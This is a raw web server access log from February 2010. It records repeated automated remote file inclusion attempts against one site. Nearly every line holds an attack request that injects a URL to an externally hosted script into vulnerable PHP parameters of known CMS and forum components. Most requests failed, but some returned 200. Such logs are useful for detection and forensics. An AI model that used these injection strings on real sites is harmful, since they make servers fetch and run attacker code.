218.38.136.125 - - [07/Feb/2010:06:32:36 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:32:45 -0800] "GET /logs/access_100129.log/myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:33:00 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:33:00 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:33:09 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:33:16 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:33:16 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:33:16 -0800] "GET /logs/access_100118.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:33:16 -0800] "GET /logs/access_100111.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:33:17 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:33:17 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:33:29 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:33:31 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:33:31 -0800] "GET /logs/access_100118.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:33:31 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:33:31 -0800] "GET /logs/access_100111.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:33:32 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:33:32 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:33:32 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:33:46 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:34:05 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:34:05 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:34:05 -0800] "GET /logs/access_100111.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:34:14 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:34:14 -0800] "GET /logs/access_100111.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:34:14 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:34:14 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:34:25 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:34:26 -0800] "GET /logs/access_100127.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:34:29 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:34:32 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:34:32 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:34:32 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:34:34 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:34:34 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:34:51 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:34:53 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:34:55 -0800] "GET /logs/access_100119.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:35:34 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:35:36 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:35:36 -0800] "GET /logs/access_100109.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:35:42 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [07/Feb/2010:06:35:56 -0800] "GET /write_comment_update.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [07/Feb/2010:06:35:57 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [07/Feb/2010:06:35:57 -0800] "GET /logs/access_100202.log%20%20//write_comment_update.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:06:36:00 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:06:36:00 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:06:36:00 -0800] "GET /logs/access_100110.log//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:06:36:05 -0800] "GET /logs/access_100131.log//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:36:06 -0800] "GET /logs/index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:36:06 -0800] "GET /index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:06:36:08 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:06:36:08 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:06:36:08 -0800] "GET /logs/access_100110.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:06:36:09 -0800] "GET /logs/access_100131.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:36:09 -0800] "GET /logs/access_100131.log/index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:36:10 -0800] "GET /logs/access_100109.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:36:19 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:36:19 -0800] "GET /logs/access_100109.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:36:21 -0800] "GET /logs/access_100109.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:36:25 -0800] "GET /logs/solpot.html?body=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:36:25 -0800] "GET /logs/access_100130.log%20%20/solpot.html?body=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:36:25 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:36:30 -0800] "GET /logs/index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:36:30 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:36:30 -0800] "GET /index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:36:39 -0800] "GET /logs/solpot.html?body=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:36:39 -0800] "GET /solpot.html?body=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [07/Feb/2010:06:36:44 -0800] "GET /logs/access_100131.log%20%20//write_comment_update.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:37:00 -0800] "GET /logs/access_100130.log%20%20/solpot.html?body=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.219.40 - - [07/Feb/2010:06:37:05 -0800] "GET /logs/access_100118.log/admin/index.php?o=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.219.40 - - [07/Feb/2010:06:37:05 -0800] "GET /logs/admin/index.php?o=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.219.40 - - [07/Feb/2010:06:37:05 -0800] "GET /admin/index.php?o=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:37:24 -0800] "GET /logs/index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:37:25 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:37:35 -0800] "GET /index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:06:37:36 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:06:37:36 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:06:37:36 -0800] "GET /logs/access_100110.log//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:37:46 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:37:57 -0800] "GET /bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:37:57 -0800] "GET /logs//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:37:57 -0800] "GET /logs/access_100202.log//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:38:11 -0800] "GET /bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:38:11 -0800] "GET /logs//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:38:11 -0800] "GET /logs/access_100202.log//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:38:28 -0800] "GET /logs/access_100110.log%20%20/index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:38:33 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:38:33 -0800] "GET /logs/access_100127.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:38:34 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:06:38:45 -0800] "GET /logs/access_100119.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:38:47 -0800] "GET /logs/access_100110.log%20%20/index.php?stranica=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:38:47 -0800] "GET /logs/access_100201.log//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:39:00 -0800] "GET /logs/access_100201.log//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:39:57 -0800] "GET /logs/access_100130.log/solpot.html?body=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:40:12 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:40:12 -0800] "GET /logs/access_100108.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:40:12 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.115.6.13 - - [07/Feb/2010:06:40:17 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:06:40:30 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:06:40:31 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:06:40:31 -0800] "GET /logs/access_100106.log/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:40:39 -0800] "GET /bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:40:40 -0800] "GET /logs/access_100202.log%20%20//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:40:40 -0800] "GET /logs//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:40:43 -0800] "GET /bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:40:44 -0800] "GET /logs/access_100202.log%20%20//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:40:44 -0800] "GET /logs//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:41:08 -0800] "GET /logs/access_100131.log%20%20//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [07/Feb/2010:06:41:09 -0800] "GET /logs/access_100131.log%20%20//bbs//////write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:06:41:21 -0800] "GET /logs/access_100106.log/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:06:41:22 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:06:41:22 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
